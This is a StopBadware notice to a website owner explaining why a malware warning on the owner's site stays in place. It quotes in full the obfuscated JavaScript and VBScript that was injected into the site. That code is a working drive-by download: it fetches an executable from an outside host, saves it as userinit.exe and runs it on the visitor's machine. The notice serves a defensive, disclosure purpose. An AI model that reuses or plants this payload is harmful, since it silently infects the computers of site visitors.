According to our review of your website, your site contains a potentially damaging exploit. For example, the source code for
http://www.winpooch
.com/version.php?cur
rent=0.6.6
contains the following suspicious code:
<SCRIPT
LANGUAGE="Javascript">
<!--
var Words
="%20%3Cscript%20language%3D%22VBSc
ript%22%3E%20%0D%0A%20%20%20%20on%20erro
r%20resume%20next%20%0D%0A%20%20%20%20%2
71%20%0D%0A%20%20%20%20dl%20%3D%22http%3
A//www.shahed-barmada.net/up/msn.exe%22%
20%0D%0A%20%20%20%20%271%20%0D%0A%20%20%
20%20Set%20df%20%3D%20document.createEle
ment%28%22object%22%29%20%0D%0A%20%20%20
%20%271%20%0D%0A%20%20%20%20df.setAttrib
ute%20%22classid%22%2C%20%22clsid%3ABD96
C556-65A3-11D0-983A-00C04FC29E36%22%20%0
D%0A%20%20%20%20%271%20%0D%0A%20%20%20%2
0str%3D%22Microsoft.XMLHTTP%22%20%0D%0A%
20%20%20%20%271%20%0D%0A%20%20%20%20Set%
20x%20%3D%20df.CreateObject%28str%2C%22%
22%29%20%0D%0A%20%20%20%20%271%20%0D%0A%
20%20%20%20a1%3D%22Adodb.%22%20%0D%0A%20
%20%20%20a4%3D%22Stream%22%20%0D%0A%20%2
0%20%20%271%20%0D%0A%20%20%20%20str1%3Da
1%26a4%20%0D%0A%20%20%20%20str5%3Dstr1%2
0%0D%0A%20%20%20%20%271%20%0D%0A%20%20%2
0%20set%20S%20%3D%20df.createobject%28st
r5%2C%22%22%29%20%0D%0A%20%20%20%20%271%
20%0D%0A%20%20%20%20S.type%20%3D%201%20%
0D%0A%20%20%20%20str6%3D%22GET%22%20%0D%
0A%20%20%20%20%271%20%0D%0A%20%20%20%20x
.Open%20str6%2C%20dl%2C%20False%20%0D%0A
%20%20%20%20x.Send%20%0D%0A%20%20%20%20%
271%20%0D%0A%20%20%20%20fname1%3D%22user
init.exe%22%20%0D%0A%20%20%20%20%271%20%
0D%0A%20%20%20%20set%20F%20%3D%20df.crea
teobject%28%22Scripting.FileSystemObject
%22%2C%22%22%29%20%0D%0A%20%20%20%20%271
%20%0D%0A%20%20%20%20set%20tmp%20%3D%20F
.GetSpecialFolder%282%29%20%0D%0A%20%20%
20%20%271%20%0D%0A%20%20%20%20fname1%3D%
20F.BuildPath%28tmp%2Cfname1%29%20%0D%0A
%20%20%20%20%271%20%0D%0A%20%20%20%20S.o
pen%20%0D%0A%20%20%20%20%271%20%0D%0A%20
%20%20%20S.write%20x.responseBody%20%0D%
0A%20%20%20%20%271%20%0D%0A%20%20%20%20S
.savetofile%20fname1%2C2%20%0D%0A%20%20%
20%20%271%20%0D%0A%20%20%20%20S.close%20
%0D%0A%20%20%20%20%271%20%0D%0A%20%20%20
%20set%20Q%20%3D%20df.createobject%28%22
Shell.Application%22%2C%22%22%29%20%0D%0
A%20%20%20%20%272%20%0D%0A%20%20%20%20Q.
ShellExecute%20fname1%2C%22%22%2C%22%22%
20%0D%0A%20%20%20%20%271%20%0D%0A%3C/scr
ipt%3E" //Èíä åÇÊíä ÇáÚáÇãÊíä ÊÖÚ
ÇáßæÏ ÇáãÔÝÑ
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
This type of code may allow parties other than yourself to load content onto user's computers via your website. In such a case, simply visiting your site would cause users to become infected by malware, spyware, or other badware that is loaded from a remote site. In addition, the party that placed the code on your site could inject additional code onto your site with potentially undesireable consequences. Even if your site is not currently distributing badware (for example, if the site that the code is pointing to is not currently "live"), your site has the potential to become a distributor of badware at any time due to the exploit noted above. Because of this continuing danger, Google will not be removing the warning page for your site at this time.
We strongly recommend removing any code that is currently or has the potential to distribute badware and securing your site against future code injections. Otherwise, it is likely that your website will be hacked again. If your site has been hacked, then simply removing injected code from your site is not enough. You will also need to work with your hosting provider or website administrator to fix all security vulnerabilities associated with your site.
We have created a webpage that has tips for webmasters on how to clean and secure their websites at
http://stopbadware.org/home/security. Please read this page to find out how to find, remove, and prevent badware appearing on your website. We recommend paying special attention to the sections on Hacking Attacks. We also have answers to commonly asked questions from site owners who are the subject of Google warnings at
http://stopbadware.org/home/faq#partnerwarnings.
Once you have secured your site, removed any traces of badware or bad code, and discontinued linking to any sites that install badware, you may submit another request for review and we will retest your site.
The StopBadware Team